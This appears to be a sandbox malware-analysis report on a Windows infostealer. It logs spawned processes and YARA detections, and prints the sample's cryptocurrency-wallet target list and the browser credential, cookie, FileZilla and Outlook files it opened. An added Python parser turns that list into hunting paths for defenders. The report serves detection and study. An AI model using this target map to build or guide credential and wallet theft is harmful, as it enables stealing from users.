Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe"
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB341 cpuid 0_2_6C7CB341
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7935A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C7935A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1F60 GetUserNameA, 12_2_7F7A1F60
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 15.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AFBFHDBKJE.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.3033347439.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2400424009.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2352102436.00000000000F1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2992298681.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2311882782.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2345493680.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2359971482.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3337643096.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6e6e496542.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
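The wallet-target list dumped from memory above is a flat pipe-delimited table, five fields per entry: display name, base-directory code, directory relative to that base, file mask, and a trailing 0/1. The "File opened" rows in this report confirm that code 1 resolves to the user's Roaming AppData folder (the config entry `\Bitcoin\wallets\` becomes `C:\Users\user\AppData\Roaming\Bitcoin\wallets\`). The parser below is an added example for this report, not code from the sample or from the sandbox; it turns the string into concrete paths an analyst can hunt for on other hosts and maps an observed "File opened" directory back to the config entry that drove it. The mapping of code 2 to %USERPROFILE% (only used for the `.chia` entries) and the reading of the last field as a recursion flag are assumptions, and the embedded config excerpt is constructed from the first entries of the string in the report.

```python
"""Parse the pipe-delimited wallet-target list carried by the sample.

Added example for this analysis report; not the sample's own code.
Record layout inferred from the dumped string:
    <name>|<base code>|<relative dir>|<file mask>|<flag>|
Base code 1 -> %APPDATA% is confirmed by the report's "File opened" rows.
Base code 2 -> %USERPROFILE% is an assumption (only the .chia entries use it).
The trailing 0/1 being a "recurse into subdirectories" flag is an assumption.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass

# Constructed excerpt: the first entries of the string found in memory.
SAMPLE_CONFIG = (
    r"Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|"
    r"Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|"
    r"Dogecoin|1|\Dogecoin\|*wallet*.dat|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)

FIELDS_PER_RECORD = 5


@dataclass(frozen=True)
class WalletTarget:
    name: str
    base_code: str
    rel_dir: str   # starts with a backslash in every observed entry
    mask: str
    flag: str      # assumed: "1" = recurse into subdirectories

    def windows_path(
        self,
        appdata: str = r"C:\Users\user\AppData\Roaming",
        profile: str = r"C:\Users\user",
    ) -> str:
        """Resolve the base code to a directory on the sandbox machine."""
        base = {"1": appdata, "2": profile}.get(self.base_code)
        if base is None:
            # Unknown code: keep it visible rather than silently guessing.
            return f"<base{self.base_code}>" + self.rel_dir
        return base + self.rel_dir


def parse_wallet_config(blob: str) -> list[WalletTarget]:
    """Split the blob into records; names may contain backslashes, so only '|' is a separator."""
    fields = blob.split("|")
    if fields and fields[-1] == "":
        fields.pop()  # the string ends with a trailing delimiter
    if len(fields) % FIELDS_PER_RECORD != 0:
        raise ValueError(f"field count {len(fields)} is not a multiple of {FIELDS_PER_RECORD}")
    return [
        WalletTarget(*fields[i:i + FIELDS_PER_RECORD])
        for i in range(0, len(fields), FIELDS_PER_RECORD)
    ]


def hunting_paths(targets: list[WalletTarget]) -> list[str]:
    """Directory + mask pairs to look for in file-access telemetry on other hosts."""
    return [t.windows_path() + t.mask for t in targets]


def mask_matches(target: WalletTarget, filename: str) -> bool:
    """Case-insensitive wildcard match, the way Windows treats file names."""
    return fnmatch.fnmatchcase(filename.lower(), target.mask.lower())


def entries_for_opened_dir(opened_dir: str, targets: list[WalletTarget]) -> list[str]:
    """Map a directory from a 'File opened' row back to the config entries that target it."""
    wanted = opened_dir.rstrip("\\").lower()
    return [t.name for t in targets if t.windows_path().rstrip("\\").lower() == wanted]


if __name__ == "__main__":
    parsed = parse_wallet_config(SAMPLE_CONFIG)
    for path in hunting_paths(parsed):
        print(path)
    print(entries_for_opened_dir(r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet" + "\\", parsed))
```

Running it against the full string from the report (rather than the excerpt) yields the complete set of directories the sample walked, which lines up with the "File opened" rows that follow the string in this report.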

Remote Access Functionality

Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6e6e496542.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR